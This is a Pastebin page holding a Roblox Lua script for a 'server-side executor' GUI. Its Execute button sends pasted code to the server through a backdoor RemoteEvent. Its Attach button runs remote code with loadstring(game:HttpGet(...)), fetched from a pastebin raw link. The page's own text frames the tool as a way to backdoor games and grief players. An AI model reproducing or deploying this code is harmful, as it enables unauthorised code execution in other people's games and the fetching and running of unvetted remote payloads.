Advertisement
HackerWRD

ROBLOX SS EXECUTOR + CHECK IF NOT THEN LOADS THE BACKDOOR.EXE!

Dec 17th, 2021
66
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 4.43 KB | None | 0 0
  1. -- Gui to Lua
  2. -- Version: 3.2
  3.  
  4. -- Instances:
  5.  
  6. local ExecutorSS = Instance.new("ScreenGui")
  7. local MainSS = Instance.new("Frame")
  8. local TitleSS = Instance.new("TextLabel")
  9. local ExecuteSS = Instance.new("TextButton")
  10. local ClearSS = Instance.new("TextButton")
  11. local CheckSS = Instance.new("TextButton")
  12. local ScriptSS = Instance.new("TextBox")
  13. local MessageSS = Instance.new("Frame")
  14. local MessageTEXTSS = Instance.new("TextLabel")
  15.  
  16. --Properties:
  17.  
  18. ExecutorSS.Name = "ExecutorSS"
  19. ExecutorSS.Parent = game.CoreGui
  20. ExecutorSS.ZIndexBehavior = Enum.ZIndexBehavior.Sibling
  21. ExecutorSS.ResetOnSpawn = false
  22.  
  23. MainSS.Name = "MainSS"
  24. MainSS.Parent = ExecutorSS
  25. MainSS.Active = true
  26. MainSS.BackgroundColor3 = Color3.fromRGB(75, 75, 75)
  27. MainSS.BorderSizePixel = 0
  28. MainSS.Position = UDim2.new(0.0534521192, 0, 0.13846153, 0)
  29. MainSS.Size = UDim2.new(0, 598, 0, 329)
  30. MainSS.Draggable = true
  31.  
  32. TitleSS.Name = "TitleSS"
  33. TitleSS.Parent = MainSS
  34. TitleSS.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  35. TitleSS.BackgroundTransparency = 1.000
  36. TitleSS.Size = UDim2.new(0, 598, 0, 43)
  37. TitleSS.Font = Enum.Font.SourceSansBold
  38. TitleSS.Text = "REKT SS EXECUTOR"
  39. TitleSS.TextColor3 = Color3.fromRGB(181, 181, 181)
  40. TitleSS.TextScaled = true
  41. TitleSS.TextSize = 14.000
  42. TitleSS.TextWrapped = true
  43.  
  44. ExecuteSS.Name = "ExecuteSS"
  45. ExecuteSS.Parent = MainSS
  46. ExecuteSS.BackgroundColor3 = Color3.fromRGB(130, 130, 130)
  47. ExecuteSS.Position = UDim2.new(0.0836120471, 0, 0.772036433, 0)
  48. ExecuteSS.Size = UDim2.new(0, 105, 0, 44)
  49. ExecuteSS.Font = Enum.Font.SourceSans
  50. ExecuteSS.Text = "Execute"
  51. ExecuteSS.TextColor3 = Color3.fromRGB(66, 66, 66)
  52. ExecuteSS.TextScaled = true
  53. ExecuteSS.TextSize = 14.000
  54. ExecuteSS.TextStrokeTransparency = 0.000
  55. ExecuteSS.TextWrapped = true
  56.  
  57. ClearSS.Name = "ClearSS"
  58. ClearSS.Parent = MainSS
  59. ClearSS.BackgroundColor3 = Color3.fromRGB(130, 130, 130)
  60. ClearSS.Position = UDim2.new(0.295986623, 0, 0.772036433, 0)
  61. ClearSS.Size = UDim2.new(0, 105, 0, 44)
  62. ClearSS.Font = Enum.Font.SourceSans
  63. ClearSS.Text = "Clear"
  64. ClearSS.TextColor3 = Color3.fromRGB(66, 66, 66)
  65. ClearSS.TextScaled = true
  66. ClearSS.TextSize = 14.000
  67. ClearSS.TextStrokeTransparency = 0.000
  68. ClearSS.TextWrapped = true
  69.  
  70. CheckSS.Name = "CheckSS"
  71. CheckSS.Parent = MainSS
  72. CheckSS.BackgroundColor3 = Color3.fromRGB(130, 130, 130)
  73. CheckSS.Position = UDim2.new(0.511705697, 0, 0.772036433, 0)
  74. CheckSS.Size = UDim2.new(0, 105, 0, 44)
  75. CheckSS.Font = Enum.Font.SourceSans
  76. CheckSS.Text = "Attach"
  77. CheckSS.TextColor3 = Color3.fromRGB(66, 66, 66)
  78. CheckSS.TextScaled = true
  79. CheckSS.TextSize = 14.000
  80. CheckSS.TextStrokeTransparency = 0.000
  81. CheckSS.TextWrapped = true
  82.  
  83. ScriptSS.Name = "ScriptSS"
  84. ScriptSS.Parent = MainSS
  85. ScriptSS.BackgroundColor3 = Color3.fromRGB(40, 40, 40)
  86. ScriptSS.BorderSizePixel = 0
  87. ScriptSS.Position = UDim2.new(0.058528427, 0, 0.176291794, 0)
  88. ScriptSS.Size = UDim2.new(0, 459, 0, 179)
  89. ScriptSS.ClearTextOnFocus = false
  90. ScriptSS.Font = Enum.Font.SourceSansBold
  91. ScriptSS.Text = "-- PASTE THE SCRIPT AND YOU CAN REKT DA KIDS!"
  92. ScriptSS.TextColor3 = Color3.fromRGB(255, 255, 255)
  93. ScriptSS.TextSize = 15.000
  94. ScriptSS.TextWrapped = true
  95.  
  96. MessageSS.Name = "MessageSS"
  97. MessageSS.Parent = ExecutorSS
  98. MessageSS.BackgroundColor3 = Color3.fromRGB(203, 203, 203)
  99. MessageSS.BackgroundTransparency = 0.500
  100. MessageSS.Position = UDim2.new(0.239420936, 0, 0.232967049, 0)
  101. MessageSS.Size = UDim2.new(0, 263, 0, 245)
  102. MessageSS.Visible = false
  103.  
  104. MessageTEXTSS.Name = "MessageTEXTSS"
  105. MessageTEXTSS.Parent = MessageSS
  106. MessageTEXTSS.BackgroundColor3 = Color3.fromRGB(255, 255, 255)
  107. MessageTEXTSS.Position = UDim2.new(0.216730043, 0, 0.212244898, 0)
  108. MessageTEXTSS.Size = UDim2.new(0, 150, 0, 115)
  109. MessageTEXTSS.Font = Enum.Font.SourceSans
  110. MessageTEXTSS.Text = "PRESS F9 TO SEE MESSAGE" -- SOME BROKEN STUFF XD
  111. MessageTEXTSS.TextColor3 = Color3.fromRGB(0, 0, 0)
  112. MessageTEXTSS.TextSize = 14.000
  113. -- Scripts:
  114. ExecuteSS.MouseButton1Click:connect(function()
  115. game.ReplicatedStorage.RemoteEvent:FireServer(ScriptSS.Text)
  116. end)
  117.  
  118. ClearSS.MouseButton1Click:connect(function()
  119. ScriptSS.Text = ""
  120. end)
  121.  
  122. CheckSS.MouseButton1Click:connect(function()
  123. if game.ReplicatedStorage:FindFirstChild("RemoteEvent") then
  124. print("THIS GAME IS SERVER-SIDED")
  125. else
  126. print("Loading Backdoor This Game Is Backdoored Not SS")
  127. wait(0.5)
  128. if not game.ReplicatedStorage:FindFirstChild("RemoteEvent") then
  129. wait(0.3)
  130. loadstring(game:HttpGet(("https://pastebin.com/raw/3BKW2FbU"), true))()
  131. end
  132. end
  133. end)
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement